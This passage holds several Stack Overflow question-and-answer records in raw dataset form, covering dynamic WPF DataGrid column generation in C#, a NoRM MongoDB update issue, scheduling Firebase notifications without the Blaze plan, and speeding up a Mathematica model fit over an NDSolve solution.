d, DependencyPropertyChangedEventArgs e)\n {\n var grid = d as DataGrid;\n var dataSource = e.NewValue as RefDataRecord;\n\n grid.ItemsSource = dataSource;\n grid.Columns.Clear();\n int count = 0;\n foreach (var col in dataSource.Columns)\n {\n grid.Columns.Add(\n new DataGridTextColumn\n {\n Header = col.Name,\n Binding = new Binding(string.Format(\"[{0}]\", count))\n }\n );\n count++;\n }\n }\n\n public static RefDataRecord GetRefDataSource(DependencyObject dependencyObject)\n {\n return (RefDataRecord) dependencyObject.GetValue(RefDataSourceProperty);\n }\n\n public static void SetRefDataSource(DependencyObject dependencyObject, RefDataRecord value)\n {\n dependencyObject.SetValue(RefDataSourceProperty, value);\n }\n}\n<\/code>\nhttp:\/\/msdn.microsoft.com\/en-us\/library\/system.windows.controls.datagridtemplatecolumn.celltemplate(v=vs.95).aspx\nAnswer: WPF DataGrid creates DataGridComboBoxColumn by default if data source property type derives from Enum and sets DataGridColumn.IsReadyOnly by default if property doesn't have public setter or if property has ReadOnlyAttribute with ReadOnlyAttribute.IsReadOnly = true.\nI will now show how to customize DataGrid column generation if your data source properties do not satisfy default conditions stated above.\nFirstly, I will introduce two attributes used to specify that property is read-only (EditableAttribute) and that property should be visualized as ComboBox with predefined drop-down items (NameValueAttribute).\nHere is EditableAttribute.cs:\n<code>using System;\n\nnamespace WpfApplication\n{\n [AttributeUsage(AttributeTargets.Property, AllowMultiple = false)]\n public sealed class EditableAttribute : Attribute\n {\n public bool AllowEdit { get; set; }\n }\n}\n<\/code>\nHere is NameValueAttribute.cs:\n<code>using System;\n\nnamespace WpfApplication\n{\n [AttributeUsage(AttributeTargets.Property, AllowMultiple = true)]\n public sealed class NameValueAttribute : Attribute\n {\n public string Name { get; set; }\n public object Value { get; set; }\n }\n}\n<\/code>\nNext, we need some sample classes that will be used for demonstration.\nSo here is Person.cs class that will represent a single item (row) in a DataGrid:\n<code>using System.ComponentModel;\n\nnamespace WpfApplication\n{\n public class Person : ObservableObject\n {\n private string name;\n private string surname;\n private char gender;\n\n public string Name\n {\n get { return this.name; }\n set { this.SetValue(ref this.name, value, \"Name\"); }\n }\n\n [Editable(AllowEdit = false)]\n public string Surname\n {\n get { return this.surname; }\n set { this.SetValue(ref this.surname, value, \"Surname\"); }\n }\n\n [NameValue(Name = \"Male\", Value = 'M')]\n [NameValue(Name = \"Female\", Value = 'F')]\n public char Gender\n {\n get { return this.gender; }\n set { this.SetValue(ref this.gender, value, \"Gender\"); }\n }\n }\n}\n<\/code>\nNotice how Surname property has EditableAttribute applied and Gender property has NameValueAttributes applied.\nAnd here is People.cs class that will represent DataGrid's data source:\n<code>using System.Collections.ObjectModel;\n\nnamespace WpfApplication\n{\n public class People : ObservableCollection<Person>\n {\n public People()\n {\n for (int i = 0; i < 100; ++i)\n this.Items.Add(new Person()\n {\n Name = \"Name \" + i,\n Surname = \"Surname \" + i,\n Gender = i % 2 == 0 ? 'M' : 'F'\n });\n }\n }\n}\n<\/code>\nBase class for Person is ObservableObject.cs which is common to all data-binding applications:\n<code>using System.Collections.Generic;\nusing System.ComponentModel;\n\nnamespace WpfApplication\n{\n public abstract class ObservableObject : INotifyPropertyChanged\n {\n public event PropertyChangedEventHandler PropertyChanged;\n\n protected virtual void OnPropertyChanged(PropertyChangedEventArgs e)\n {\n var handler = this.PropertyChanged;\n if (handler != null)\n handler(this, e);\n }\n\n protected void SetValue<T>(ref T field, T value, string propertyName)\n {\n if (!EqualityComparer<T>.Default.Equals(field, value))\n {\n field = value;\n this.OnPropertyChanged(new PropertyChangedEventArgs(propertyName));\n }\n }\n }\n}\n<\/code>\nNow, here is a XAML for MainWindow.xaml that hosts DataGrid control:\n<code><Window x:Class=\"WpfApplication.MainWindow\"\n xmlns=\"http:\/\/schemas.microsoft.com\/winfx\/2006\/xaml\/presentation\"\n xmlns:x=\"http:\/\/schemas.microsoft.com\/winfx\/2006\/xaml\"\n xmlns:local=\"clr-namespace:WpfApplication\">\n <Window.Resources>\n <local:People x:Key=\"itemsSource\"\/>\n <\/Window.Resources>\n <DataGrid ItemsSource=\"{StaticResource itemsSource}\" AutoGeneratingColumn=\"OnAutoGeneratingColumn\"\/>\n<\/Window>\n<\/code>\nCrucial part is DataGrid.AutoGeneratingColumn event handler <code>OnAutoGeneratingColumn<\/code>.\nThis event gets fired after DataGrid generates a DataGridColumn and is fired once for every auto-generated column. It is used to customize the auto-generated column or specify different one, depending on the provided data source property.\nHere is MainWindow.xaml.cs code-behind in which <code>OnAutoGeneratingColumn<\/code> event handler does exactly that. It customized generated column by setting it as read-only if data source property has EditableAttribute with AllowEdit = false, and it overrides auto-generated column with DataGridComboBoxColumn if data source property has NameValueAttributes:\n<code>using System;\nusing System.ComponentModel;\nusing System.Linq;\nusing System.Windows;\nusing System.Windows.Controls;\n\nnamespace WpfApplication\n{\n public partial class MainWindow : Window\n {\n public MainWindow()\n {\n InitializeComponent();\n }\n\n private void OnAutoGeneratingColumn(object sender, DataGridAutoGeneratingColumnEventArgs e)\n {\n var propertyDescriptor = (PropertyDescriptor)e.PropertyDescriptor;\n var dataBoundColumn = (DataGridBoundColumn)e.Column;\n\n var comboBoxColumn = GenerateComboBoxColumn(propertyDescriptor, dataBoundColumn);\n if (comboBoxColumn != null)\n e.Column = comboBoxColumn;\n\n if (IsReadOnlyProperty(propertyDescriptor))\n e.Column.IsReadOnly = true;\n }\n\n private static DataGridComboBoxColumn GenerateComboBoxColumn(PropertyDescriptor propertyDescriptor, DataGridBoundColumn dataBoundColumn)\n {\n var nameValueAttributes = Attribute.GetCustomAttributes(propertyDescriptor.ComponentType.GetProperty(propertyDescriptor.Name)).OfType<NameValueAttribute>().ToArray();\n\n if (nameValueAttributes.Length > 0)\n return new DataGridComboBoxColumn()\n {\n ItemsSource = nameValueAttributes,\n DisplayMemberPath = \"Name\",\n SelectedValuePath = \"Value\",\n SelectedValueBinding = dataBoundColumn.Binding\n };\n else\n return null;\n }\n\n private static bool IsReadOnlyProperty(PropertyDescriptor propertyDescriptor)\n {\n var editableAttribute = propertyDescriptor.Attributes.OfType<EditableAttribute>().FirstOrDefault();\n return editableAttribute != null ? !editableAttribute.AllowEdit : false;\n }\n }\n}\n<\/code>\n\nUPDATE FOR DYNAMIC CASE:\nWPF supports dynamic reflection with ICustomTypeDescriptor implemented on data items and ITypedList implemented on collection.\nAlso, .NET 4.5 supports ICustomTypeProvider, but since I do not have .NET 4.5 installed, I haven't tested it.\nNameValueAttribute.cs is same as before.\nHere is very simple implementation of ICustomTypeDescriptor and ITypedList in a working sample:\nDataProperty.cs\n<code>using System;\nusing System.ComponentModel;\n\nnamespace WpfApplication\n{\n public class DataProperty : PropertyDescriptor\n {\n private readonly Type propertyType;\n private readonly bool isReadOnly;\n private readonly Attribute[] attributes;\n\n public DataProperty(string propertyName, Type propertyType, bool isReadOnly, params Attribute[] attributes)\n : base(propertyName, null)\n {\n this.propertyType = propertyType;\n this.isReadOnly = isReadOnly;\n this.attributes = attributes;\n }\n\n protected override Attribute[] AttributeArray\n {\n get { return this.attributes; }\n set { throw new NotImplementedException(); }\n }\n\n public override Type ComponentType\n {\n get { return typeof(DataRecord); }\n }\n\n public override Type PropertyType\n {\n get { return this.propertyType; }\n }\n\n public override bool IsReadOnly\n {\n get { return this.isReadOnly; }\n }\n\n public override object GetValue(object component)\n {\n return ((DataRecord)component)[this.Name];\n }\n\n public override void SetValue(object component, object value)\n {\n if (!this.isReadOnly)\n ((DataRecord)component)[this.Name] = value;\n }\n\n #region Not implemented PropertyDescriptor Members\n\n public override bool CanResetValue(object component)\n {\n throw new NotImplementedException();\n }\n\n public override void ResetValue(object component)\n {\n throw new NotImplementedException();\n }\n\n public override bool ShouldSerializeValue(object component)\n {\n throw new NotImplementedException();\n }\n\n #endregion\n }\n}\n<\/code>\nDataRecord.cs\n<code>using System;\nusing System.Collections.Generic;\nusing System.ComponentModel;\n\nnamespace WpfApplication\n{\n public class DataRecord : INotifyPropertyChanged, ICustomTypeDescriptor\n {\n public event PropertyChangedEventHandler PropertyChanged;\n\n internal ITypedList container;\n\n private readonly IDictionary<string, object> values = new SortedList<string, object>();\n\n public object this[string propertyName]\n {\n get\n {\n object value;\n this.values.TryGetValue(propertyName, out value);\n return value;\n }\n set\n {\n if (!object.Equals(this[propertyName], value))\n {\n this.values[propertyName] = value;\n this.OnPropertyChanged(new PropertyChangedEventArgs(propertyName));\n }\n }\n }\n\n protected virtual void OnPropertyChanged(PropertyChangedEventArgs e)\n {\n var handler = this.PropertyChanged;\n if (handler != null)\n handler(this, e);\n }\n\n PropertyDescriptorCollection ICustomTypeDescriptor.GetProperties()\n {\n return this.container.GetItemProperties(null);\n }\n\n #region Not implemented ICustomTypeDescriptor Members\n\n AttributeCollection ICustomTypeDescriptor.GetAttributes()\n {\n throw new NotImplementedException();\n }\n\n string ICustomTypeDescriptor.GetClassName()\n {\n throw new NotImplementedException();\n }\n\n string ICustomTypeDescriptor.GetComponentName()\n {\n throw new NotImplementedException();\n }\n\n TypeConverter ICustomTypeDescriptor.GetConverter()\n {\n throw new NotImplementedException();\n }\n\n EventDescriptor ICustomTypeDescriptor.GetDefaultEvent()\n {\n throw new NotImplementedException();\n }\n\n PropertyDescriptor ICustomTypeDescriptor.GetDefaultProperty()\n {\n throw new NotImplementedException();\n }\n\n object ICustomTypeDescriptor.GetEditor(Type editorBaseType)\n {\n throw new NotImplementedException();\n }\n\n EventDescriptorCollection ICustomTypeDescriptor.GetEvents(Attribute[] attributes)\n {\n throw new NotImplementedException();\n }\n\n EventDescriptorCollection ICustomTypeDescriptor.GetEvents()\n {\n throw new NotImplementedException();\n }\n\n PropertyDescriptorCollection ICustomTypeDescriptor.GetProperties(Attribute[] attributes)\n {\n throw new NotImplementedException();\n }\n\n object ICustomTypeDescriptor.GetPropertyOwner(PropertyDescriptor pd)\n {\n throw new NotImplementedException();\n }\n\n #endregion\n }\n}\n<\/code>\nDataRecordCollection.cs:\n<code>using System;\nusing System.Collections.ObjectModel;\nusing System.ComponentModel;\n\nnamespace WpfApplication\n{\n public class DataRecordCollection<T> : ObservableCollection<T>, ITypedList where T : DataRecord\n {\n private readonly PropertyDescriptorCollection properties;\n\n public DataRecordCollection(params DataProperty[] properties)\n {\n this.properties = new PropertyDescriptorCollection(properties);\n }\n\n protected override void InsertItem(int index, T item)\n {\n item.container = this;\n base.InsertItem(index, item);\n }\n\n PropertyDescriptorCollection ITypedList.GetItemProperties(PropertyDescriptor[] listAccessors)\n {\n return this.properties;\n }\n\n string ITypedList.GetListName(PropertyDescriptor[] listAccessors)\n {\n throw new NotImplementedException();\n }\n }\n}\n<\/code>\nMainWindow.xaml:\n<code><Window x:Class=\"WpfApplication.MainWindow\"\n xmlns=\"http:\/\/schemas.microsoft.com\/winfx\/2006\/xaml\/presentation\"\n xmlns:x=\"http:\/\/schemas.microsoft.com\/winfx\/2006\/xaml\"\n xmlns:local=\"clr-namespace:WpfApplication\">\n <DataGrid x:Name=\"dataGrid\" AutoGeneratingColumn=\"OnAutoGeneratingColumn\"\/>\n<\/Window>\n<\/code>\nMainWindow.xaml.cs:\n<code>using System.ComponentModel;\nusing System.Linq;\nusing System.Windows;\nusing System.Windows.Controls;\n\nnamespace WpfApplication\n{\n public partial class MainWindow : Window\n {\n public MainWindow()\n {\n InitializeComponent();\n\n var records = new DataRecordCollection<DataRecord>(\n new DataProperty(\"Name\", typeof(string), false),\n new DataProperty(\"Surname\", typeof(string), true),\n new DataProperty(\"Gender\", typeof(char), false, new NameValueAttribute() { Name = \"Male\", Value = 'M' }, new NameValueAttribute() { Name = \"Female\", Value = 'F' }));\n\n for (int i = 0; i < 100; ++i)\n {\n var record = new DataRecord();\n record[\"Name\"] = \"Name \" + i;\n record[\"Surname\"] = \"Surname \" + i;\n record[\"Gender\"] = i % 2 == 0 ? 'M' : 'F';\n records.Add(record);\n }\n\n this.dataGrid.ItemsSource = records;\n }\n\n private void OnAutoGeneratingColumn(object sender, DataGridAutoGeneratingColumnEventArgs e)\n {\n e.Column.Header = ((PropertyDescriptor)e.PropertyDescriptor).DisplayName;\n\n var propertyDescriptor = (PropertyDescriptor)e.PropertyDescriptor;\n var dataBoundColumn = (DataGridBoundColumn)e.Column;\n\n var comboBoxColumn = GenerateComboBoxColumn(propertyDescriptor, dataBoundColumn);\n if (comboBoxColumn != null)\n e.Column = comboBoxColumn;\n }\n\n private static DataGridComboBoxColumn GenerateComboBoxColumn(PropertyDescriptor propertyDescriptor, DataGridBoundColumn dataBoundColumn)\n {\n var nameValueAttributes = propertyDescriptor.Attributes.OfType<NameValueAttribute>().ToArray();\n\n if (nameValueAttributes.Length > 0)\n return new DataGridComboBoxColumn()\n {\n ItemsSource = nameValueAttributes,\n DisplayMemberPath = \"Name\",\n SelectedValuePath = \"Value\",\n SelectedValueBinding = dataBoundColumn.Binding\n };\n else\n return null;\n }\n }\n}\n<\/code>\nComment: Hi Stipo, Thanks for replying. In my case I do not know the columns at compile - time. The way you have represented using the Person object, think I have just a property bag of generic System.Object So, I cannot set the attributes the way you have shown.\nComment: No, it won't work for AutogenerateColumns = false because then you must create columns by yourself. The whole point of ITypedList is to provide all the necessary information to DataGrid so it automatically generates columns from information provided by ITypedList.\nComment: I have really learned something new. The `PropertyDescriptor` mechanism is so much exciting. Thanks !!!\nAnswer: Firstly, one of the main advantages of WPF to WinForms is ability to declare user interface using templates. And you should avoid declaring UI components in code as as possible.\nAs i understand you want to display collection of different objects based on object type\/data.\nThe best way to implement such logic - implement your own TemplateSelector\nI suggest you read next articles:\n\nhttp:\/\/www.wpftutorial.net\/DataGrid.html\nhttp:\/\/www.switchonthecode.com\/tutorials\/wpf-tutorial-how-to-use-a-datatemplateselector\n\nP.S.\nFor reference. Example of declaring DataTemplate in code:\n<code>\/\/create the data template\nDataTemplate cardLayout = new DataTemplate();\ncardLayout.DataType = typeof(CreditCardPayment);\n\n\/\/set up the stack panel\nFrameworkElementFactory spFactory = new FrameworkElementFactory(typeof(StackPanel));\nspFactory.Name = \"myComboFactory\";\nspFactory.SetValue(StackPanel.OrientationProperty, Orientation.Horizontal);\n\n\/\/set up the card holder textblock\nFrameworkElementFactory cardHolder = new FrameworkElementFactory(typeof(TextBlock));\ncardHolder.SetBinding(TextBlock.TextProperty, new Binding(\"BillToName\"));\ncardHolder.SetValue(TextBlock.ToolTipProperty, \"Card Holder Name\");\nspFactory.AppendChild(cardHolder);\n\n\/\/set up the card number textblock\nFrameworkElementFactory cardNumber = new FrameworkElementFactory(typeof(TextBlock));\ncardNumber.SetBinding(TextBlock.TextProperty, new Binding(\"SafeNumber\"));\ncardNumber.SetValue(TextBlock.ToolTipProperty, \"Credit Card Number\");\nspFactory.AppendChild(cardNumber);\n\n\/\/set up the notes textblock\nFrameworkElementFactory notes = new FrameworkElementFactory(typeof(TextBlock));\nnotes.SetBinding(TextBlock.TextProperty, new Binding(\"Notes\"));\nnotes.SetValue(TextBlock.ToolTipProperty, \"Notes\");\nspFactory.AppendChild(notes);\n\n\/\/set the visual tree of the data template\ncardLayout.VisualTree = spFactory;\n\n\/\/set the item template to be our shiny new data template\ndrpCreditCardNumberWpf.ItemTemplate = cardLayout;\n<\/code>\nbut as i say above, you should avoid this.\nComment: You are only contradicting your solution and asking me to avoid this. So, I will wait for better answers then.\nAnswer: This is the correct answer - http:\/\/www.paulstovell.com\/dynamic-datagrid (see the template creation logic dynamically. Its clever).\nAnd, MMVM will be achieved like this - http:\/\/www.codeproject.com\/Articles\/36462\/Binding-a-ListView-to-a-Data-Matrix (almost what I have posted in the question)\nAnswer: I was away from the Internet for a few days, but I think that I have found the better approach with simplified PropertyDescriptor architecture which doesn't require to implement ICustomTypeDescriptor. Here is the entire code:\n<code>using System;\nusing System.Collections;\nusing System.Collections.Generic;\nusing System.Collections.ObjectModel;\nusing System.ComponentModel;\nusing System.Windows;\nusing System.Windows.Controls;\nusing System.Windows.Data;\n\nnamespace WpfApplication\n{\n public partial class MainWindow : Window\n {\n public MainWindow()\n {\n InitializeComponent();\n\n var records = new RecordCollection(new Property(\"Name\"), new Property(\"Surname\"));\n\n for (int i = 0; i < 1000; ++i)\n records.Add(new Record()\n {\n { \"Name\", \"John \" + i },\n { \"Surname\", \"Doe \" + i }\n });\n\n this.dataGrid.ItemsSource = records;\n }\n\n private void OnAutoGeneratingColumn(object sender, DataGridAutoGeneratingColumnEventArgs e)\n {\n var property = e.PropertyDescriptor as Property;\n if (property != null)\n {\n var binding = new Binding() { Path = new PropertyPath(property), Mode = property.IsReadOnly ? BindingMode.OneWay : BindingMode.TwoWay };\n var dataGridBoundColumn = e.Column as DataGridBoundColumn;\n if (dataGridBoundColumn != null)\n dataGridBoundColumn.Binding = binding;\n else\n {\n var dataGridComboBoxColumn = e.Column as DataGridComboBoxColumn;\n if (dataGridComboBoxColumn != null)\n dataGridComboBoxColumn.SelectedItemBinding = binding;\n }\n }\n }\n }\n\n public sealed class Record : INotifyPropertyChanged, IEnumerable\n {\n public event PropertyChangedEventHandler PropertyChanged;\n\n private readonly IDictionary<string, object> values = new SortedList<string, object>(StringComparer.Ordinal);\n\n private void OnPropertyChanged(PropertyChangedEventArgs e)\n {\n var handler = this.PropertyChanged;\n if (handler != null)\n handler(this, e);\n }\n\n public object GetValue(string name)\n {\n object value;\n return this.values.TryGetValue(name, out value) ? value : null;\n }\n\n public void SetValue(string name, object value)\n {\n if (!object.Equals(this.GetValue(name), value))\n {\n this.values[name] = value;\n this.OnPropertyChanged(new PropertyChangedEventArgs(name));\n }\n }\n\n public void Add(string name, object value)\n {\n this.values[name] = value;\n }\n\n IEnumerator IEnumerable.GetEnumerator()\n {\n return this.values.GetEnumerator();\n }\n }\n\n public sealed class Property : PropertyDescriptor\n {\n private readonly Type propertyType;\n private readonly bool isReadOnly;\n\n public Property(string name)\n : this(name, typeof(string))\n {\n }\n\n public Property(string name, Type propertyType)\n : this(name, propertyType, false)\n {\n }\n\n public Property(string name, Type propertyType, bool isReadOnly, params Attribute[] attributes)\n : base(name, attributes)\n {\n this.propertyType = propertyType;\n this.isReadOnly = isReadOnly;\n }\n\n public override Type ComponentType\n {\n get { return typeof(Record); }\n }\n\n public override Type PropertyType\n {\n get { return this.propertyType; }\n }\n\n public override bool IsReadOnly\n {\n get { return this.isReadOnly; }\n }\n\n public override object GetValue(object component)\n {\n var record = component as Record;\n return record != null ? record.GetValue(this.Name) : null;\n }\n\n public override void SetValue(object component, object value)\n {\n var record = component as Record;\n if (record != null)\n record.SetValue(this.Name, value);\n }\n\n public override bool CanResetValue(object component)\n {\n throw new NotSupportedException();\n }\n\n public override void ResetValue(object component)\n {\n throw new NotSupportedException();\n }\n\n public override bool ShouldSerializeValue(object component)\n {\n throw new NotSupportedException();\n }\n }\n\n public sealed class RecordCollection : ObservableCollection<Record>, ITypedList\n {\n private readonly PropertyDescriptorCollection properties;\n\n public RecordCollection(params Property[] properties)\n {\n this.properties = new PropertyDescriptorCollection(properties);\n }\n\n PropertyDescriptorCollection ITypedList.GetItemProperties(PropertyDescriptor[] listAccessors)\n {\n return this.properties;\n }\n\n string ITypedList.GetListName(PropertyDescriptor[] listAccessors)\n {\n return string.Empty;\n }\n }\n}\n\n<Window x:Class=\"WpfApplication.MainWindow\"\n xmlns=\"http:\/\/schemas.microsoft.com\/winfx\/2006\/xaml\/presentation\"\n xmlns:x=\"http:\/\/schemas.microsoft.com\/winfx\/2006\/xaml\"\n xmlns:local=\"clr-namespace:WpfApplication\">\n <DataGrid x:Name=\"dataGrid\" AutoGeneratingColumn=\"OnAutoGeneratingColumn\"\/>\n<\/Window>\n<\/code>\nThe key thing in this code is creating a Binding with a BindingPath that contains a Property instance, instead of a string. This enables a simplification of PropertyDescriptor architecture because ICustomTypeDescriptor is not required anymore.\nWhat do you think about this solution?\nComment: Thanks !! The idea is to use `MVVM` approach and change the cells dynamically based on type of data i.e. if its a collection, hook in a combobox cell, if a string then a TextBlock (readonly case) or a TextBox (if editable). I do not want to use the codebehind .cs file at all. Inspired on MVVM by this awesome video in this blog - `http:\/\/blog.lab49.com\/archives\/2650`. So the link below which I have posted talks about `Data Templating (XAML)` based on the type of Data. `Can we do something similar with your logic in place ?`\nComment: DataGrid is a special control, it doesn't use implicit (based on DataType) or explicit DataTemplate when generating cell content. Cell content generation is based on a column to which cell belongs. DataGridColumn.GenerateElement (http:\/\/msdn.microsoft.com\/en-us\/library\/system.windows.controls.datagridcolumn.generateelement.aspx) is a method responsible for generating cell content and each DataGridColumn-derived class generates a different content. So I think that you won't be able to solve this without using codebehind. Note that codebehind should not be considered wrong in MVVM as many think.\nComment: It would be wrong only if your ViewModel code-behind would reference Views, which is clearly not the case in my presented solution. I am not sure anymore is your data column-homogeneous or column-heterogeneous (are all cells in a specific column of the same type?). If all cells in a specific column are of the same type, then you can easily extend my code with your requirements (you only need to handle creating of ComboBox cell, other requirements are already taken care of) by extending the code in MainWindow.OnAutoGeneratingColumn method.\nComment: In MainWindow.OnAutoGeneratingColumn method, just check if Property.PropertyType is a collection type, and if it is, set e.Column to new instance of DataGridComboBoxColumn and set ItemsSource and SelectedItemBinding on a DataGridComboBoxColumn.\n","meta":{"source":"stackoverflow","title":"WPF: Datagrid - Apply DataGridTemplateColumn.CellTemplate dynamically","dup_signals":{}},"subset":"stackexchange"} +{"text":"NoRM UpdateOne no work\n\nQuestion: I'm using NoRM + MongoDB in an application test. I found the source code of the Mongo Session http:\/\/normproject.org\/samples where the method update wrapp this:\n<code>using(var db = Mongo.Create(_connectionString))\n{\n db.GetCollection<T>().UpdateOne(item, item);\n}\n<\/code>\nBut when I send object to update using this method my object no save, but what if I call Save instead of UpdateOne my object is save.\nMy objects: https:\/\/gist.github.com\/1616565\nWhat's wrong?\nAnswer: I would recommend using the official C# driver, which you can find at:\nhttp:\/\/www.mongodb.org\/display\/DOCS\/CSharp+Language+Center\nAnswer: Hopefully this helps:\nhttp:\/\/groups.google.com\/group\/norm-mongodb\/browse_thread\/thread\/8ba8b462b6fe16a5\/a4bfaecef4b1cbfc?lnk=gst&q=Update#a4bfaecef4b1cbfc\nAnup\n","meta":{"source":"stackoverflow","title":"NoRM UpdateOne no work","dup_signals":{}},"subset":"stackexchange"} +{"text":"Firebase Automated Cron Job Options Without Functions\n\nQuestion: I have an app (Flutter using Android Studio) I am on the final stages of and I would, in an ideal world, want to include a feature to notify the user via a mobile notification if a date held against their UID is equal to today (let's use a birthday as an example).\nI've spent 2 days looking in to all options, and was very close to using Cloud Functions to store a once a day cron function to notify all users, using FCM, based on the condition above - but something stopped me.\nI'm very new to app building. So new that I can not confidently say I do not have a bug or infinity loop somewhere to rack up a huge bill upgrading to the Blaze plan - which without I can not use functions (I literally had credit card in hand on the upgrade page and stopped).\nAfter 3 months of app building I feel I'm between a rock and a hard place. I don't want to launch without auto-notifications (as it's pretty key to the slickness of the app) BUT I can not risk a skies the limit, no-cap, no protection Blaze account if the worst was to happen.\nIt seems crazy for the effort to be put in to Firebase by Google, which to be fair helps new developers code and launch apps, to put them unnecessarily at risk or cost without automated protection. At least the Flame plan capped your spend - but I can see this is a real concern to new app developers such as myself (I've developed for the web for years). I just can't risk Blaze. I am more than happy to pay for things I use, but not to put myself at risk. Anyway I digress...\nWithout upgrading to Blaze - is there anyway a newbie such as myself, who is still learning the ropes, I can use FCM, and a cron job, to every day check the Cloud Firestore for users where a certain condition applies (i.e. UID date = today) - and notify them through a notification to their mobile device?\nComment: If you're looking for recommendations for products, that's off-topic for stack Overflow. Also, Cloud Functions is really the easiest way to get this work done, and your other options are going to be just as difficult or moreso.\nComment: No not products - perhaps suggestions, tutorials, plugins etc.... I'm not looking to move away from Firebase, just work within in (as a newbie not so proficient with all the terminology) without putting myself at a cost risk I am powerless to control\nComment: But if you feel this is by far the simplest option, maybe I will have to launch without the notifications - I am probably too new to the party to start looking at more complicated options :)\nComment: All recommendations for offsite resources are [off topic for Stack Overflow](https:\/\/stackoverflow.com\/help\/on-topic): \"*Questions asking us to recommend or find a book, tool, software library, tutorial or other off-site resource are off-topic for Stack Overflow*\"\nComment: Apologies - my bad\nAnswer: I would recommend using Google Cloud Functions and Cloud Scheduler to accomplish this.\nIt is worth noting that Firebase + Google Cloud provide an amount of free usage per month. It is quite likely that you could keep your usage under the limits, at least initially. Also, if you are a new Google Cloud customer, there may currently be a trial offer you can redeem for things not covered in the free tier.\n\nhttps:\/\/cloud.google.com\/free\nhttps:\/\/firebase.google.com\/pricing\nhttps:\/\/cloud.google.com\/scheduler\nComment: Thanks Chris for the suggestion. Sounds like a good option I've seen some trial offers in the region of $300, but my big worry is something wrong in the code costing thousands of dollars overnight before I read alerts set to warn. I'm getting up to 700 reads a day and it's just me testing a small number of records - so I know I have some less than efficient code somewhere!\nComment: It may be valuable to forecast your usage. Also you may want to look into configuring Budgets and Billing Alerts.\n\nhttps:\/\/cloud.google.com\/billing\/docs\/how-to\/budgets\nComment: Yes the alerts are a good idea, but if something went awry at 1am I wouldn't pick up the email alert until 8am. A lot of loops can happen in 7 hours. The cautiousness is because this is my first app so new uncharted territory. I do completely understand where you are coming from though - and useful suggestions - this just is what it is I guess\n","meta":{"source":"stackoverflow","title":"Firebase Automated Cron Job Options Without Functions","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to speed up NonlinearModelFit applied on a NDSolve solution?\n\nQuestion: I'm trying to perform fittings of a model defined through a system of ODEs to data consisting of time courses of a measured quantity.\nAs described in a previous question, the system of ODEs is as follows:\n<code>X'[t]:= m[t].X[t]\nX[t_] := {h[t], r[t], rh1[t], rh2[t], rh3[t]}\nm[t_] := {{-k1*r[t], 0, ki1, 0, 0}, {0, -k1*h[t], ki1, 0, 0}, {0, k1*h[t], -(ki1 + k2), ki2, 0}, {0, 0, k2, -(ki2 + k3), ki3}\n<\/code>\nand the actual quantity I need to evaluate is:\n<code>F:= aF.X[t]\naF:={0,aR,aRH1,aRH2,aRH3}\n<\/code>\nAfter the incorporation of some suggestions given in this forum, I end up with the following procedure to fit the model:\nModel to be fitted:\n<code>modelo[k1, ki1, k2, ki2, k3, ki3, aR, aRH1, aRH2, aRH3, Ht, Rt] =\nModule[{X, m, aF, sol},\nX[t_] := {h[t], r[t], rh1[t], rh2[t], rh3[t]};\nm[t_] := {{-k1*r[t], 0, ki1, 0, 0}, {0, -k1*h[t], ki1, 0, 0}, {0, k1*h[t], -(ki1 + k2), ki2, 0}, {0, 0, k2, -(ki2 + k3), ki3}, {0, 0, 0, k3, -ki3}};\naF = {0, aR, aRH1, aRH2, aRH3};\nsol = NDSolve[{X'[t] == m[t].X[t], X[0] == {Ht, Rt, 0, 0, 0}}, X[t], {t, 0, 500}];\nFunction[{tu}, Evaluate[aF.Flatten[X[t] \/. sol] - aR*Rt] \/. t :> tu]])\n<\/code>\nData:\n<code>data = Table[{t, .22 (1 - E^(-7.2 t)) + 0.10 (1 - E^(-0.084 t)) + 0.15 (1 - E^(-0.027 t))}, {t, 0, 500, 0.1}]\n<\/code>\nFitting routine (leaving some parameters fixed):\n<code>k1 = 0.0012;\nk2 = 0.43;\nki2 = 0.0055;\nk3 = 0.01;\nki3 = 0.0096;\naR = 0.0034;\nHt = 800;\nRt = 62; (*The last three quantities are not fitting parameters but fixed ones, whose values are known. *)\nfit = NonlinearModelFit[data, {modelo[k1, ki1, k2, ki2, k3, ki3, aR, aRH1, aRH2, aRH3, Ht, Rt][t], {2 <= ki1 <= 20, 0.001 <= aRH1 <= 0.1, 0.001 <= aRH2 <= 0.1, 0.001 <= aRH3 <= 0.1}}, {{ki1, 5}, {aRH1, .032}, {aRH2, .01}, {aRH3, .012}}, t, Method -> {NMinimize, Method -> \"NelderMead\"}]]\n<\/code>\nHere is the problem. The model works and the fitting code too, but it is too slow. For instance, it takes about 110 s (in Linux Mint MATE 1.8.1 on a dual core AMD A4 machine, with 3 GiB RAM) for a 2 iterations run and a data set of 5000 points. Given that I pretend to use the program to fit series of ~ 8 curves of ~ 14000 points, this performance is obviously too slow (it is much faster in other programs such us COPASI). Please, let me know if you have any idea on how to speed up the code.\nEdit 1:\nTo asses the quality of the fitting I add here a new data set obtained from the model with a given set of parameter values:\n<code>newdata = Table[{t, Evaluate[With[{k1 = 0.0012, ki1 = 5, k2 = 0.43, ki2 = 0.0055, k3 = 0.01, ki3 = 0.0096, aR = 0.0034, aRH1 = .032, aRH2 = .01, aRH3 = .012},modelo[k1, ki1, k2, ki2, k3, ki3, aR, aRH1, aRH2, aRH3, Ht, Rt]]][t]}, {t, 0, 500}]\n<\/code>\nComment: What are the expected results for the example?\nComment: Sorry, but I only know approximate values because the data was obtained through a function that does not contain explicitly the same parameters. May I upload a new dataset here? I could provide you simulated data if you wish.\nComment: @belisarius. I added a new data set obtained from a simulation of the model. Now, I'm trying to reformulate the problem using ParametricNDSolve and the performance seems to be getting better. I'll notify here if the problem is fixed.\nAnswer: After trying many ways to fit the -numerically solved- model described above, with lots of help from fellows, it turned out that -for this kind of model at least- fitting is much faster if ParametricNDSolve is used, instead of NDSolve, to solve the ODEs of the model. This is just what 'Guess who it is' slightly suggested in a comment to my original question.\nI just give an example based on the original model comparing the two procedures.\nModel to be fitted:\nBasically, the model is:\n<code> X'[t]=m[t].X[t],\n X[t_]={h[t],r[t],rh1[t],rh2[t],rh3[t]} (* vector of concentrations of species of the modeled chemical reaction *)\n m[t_] := {{-k1*r[t], 0, ki1, 0, 0}, {0, -k1*h[t], ki1, 0, 0}, {0, \nk1*h[t], -(ki1 + k2), ki2, 0}, {0, 0, k2, -(ki2 + k3), ki3}, {0, \n0, 0, k3, -ki3}} (* the so called 'kinetic matrix' of the system *)\n<\/code>\nAnd the quantity measured (to be fitted to experimental values) is:\n<code>F = 